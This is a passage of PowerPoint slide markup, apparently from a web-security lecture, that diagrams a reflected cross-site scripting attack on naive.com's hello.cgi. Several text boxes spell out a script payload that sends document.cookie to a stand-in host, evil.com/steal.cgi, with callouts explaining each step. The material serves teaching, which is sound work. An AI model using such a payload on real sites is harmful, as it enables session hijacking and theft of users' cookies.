                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA341070-DCD4-1248-B473-CD8A42C3D1DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1056" y="1824"/>
              <a:ext cx="1222" cy="194"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Access some web page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F4138E-7AAB-1C41-8F54-2F7A07FFA2C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3352802"/>
            <a:ext cx="2895600" cy="1384301"/>
            <a:chOff x="816" y="2112"/>
            <a:chExt cx="1824" cy="872"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70694" name="Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F15EA13-27BD-564D-80B4-4D4897FBBB19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="816" y="2208"/>
              <a:ext cx="1824" cy="144"/>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0993" name="Text Box 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D3C27E-455E-384B-8692-995AF153267C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="912" y="2112"/>
              <a:ext cx="1584" cy="872"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://naive.com/hello.cgi?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>name=&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“http://evil.com/steal.cgi?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>cookie=”+</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258513" name="AutoShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A9FD2F-3937-0E49-AAC8-1AB49847BFF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4689144"/>
            <a:ext cx="2438400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:no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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Forces victim’s browser to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>with this script as “name”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7373AA-8E2F-8041-8F66-3E35536DB1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="3505200"/>
            <a:ext cx="2819400" cy="954088"/>
            <a:chOff x="3024" y="2208"/>
            <a:chExt cx="1776" cy="601"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70692" name="Line 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5321B809-477F-D64E-AA2F-E9EBE9A3B7C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3024" y="2304"/>
              <a:ext cx="1776" cy="144"/>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0991" name="Text Box 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC41049-5DA4-534A-9486-05A0916C01B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="2208"/>
              <a:ext cx="1584" cy="601"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>hello.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(“http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>evil.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=”+</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258517" name="Text Box 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EB44E8-9721-4247-93BD-5455B8045393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9269413" y="3811589"/>
            <a:ext cx="1100366" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solid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hello.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA7E2C55-DFD1-8641-B644-240FC39F1C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324601" y="4516439"/>
            <a:ext cx="3227388" cy="1863725"/>
            <a:chOff x="3024" y="2845"/>
            <a:chExt cx="2033" cy="1174"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70689" name="Line 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56618C80-98E2-DD47-9188-B7AEAB8376C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3024" y="2976"/>
              <a:ext cx="1776" cy="202"/>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0988" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B4EFF9-C7A5-E444-B468-C8D4C7488975}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2845"/>
              <a:ext cx="1584" cy="737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;HTML&gt;Hello, dear</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>win.open(“http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>evil.com/steal.cgi?cookie=”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+document.cookie)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Welcome!&lt;/HTML&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70691" name="AutoShape 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0042A71D-608A-CE42-9C73-32FE1E40298D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3281" y="3552"/>
              <a:ext cx="1776" cy="467"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20546"/>
                <a:gd name="adj2" fmla="val -78819"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:no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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Interpreted as JavaScript </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>by victim’s browser; opens window and calls </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>steal.cgi</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t> on </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>evil.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258522" name="Picture 26" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AAF4CB-C28C-AA42-8E88-BB7C7BE4D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8523" name="Picture 27" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C2E720A-4D43-DC45-95A1-56EB0994C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438400"/>
            <a:ext cx="304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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA8CB7B-13CE-844E-B508-0201FFB13951}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="5546726"/>
            <a:ext cx="3429000" cy="473075"/>
            <a:chOff x="432" y="3494"/>
            <a:chExt cx="2160" cy="298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70685" name="Line 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6900F5CD-3E93-9040-89EE-7AF083D9143E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="3494"/>
              <a:ext cx="1776" cy="202"/>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0984" name="Text Box 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7B3EBA-3070-AF4F-861A-5190A63DAA2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="3504"/>
              <a:ext cx="1584" cy="194"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
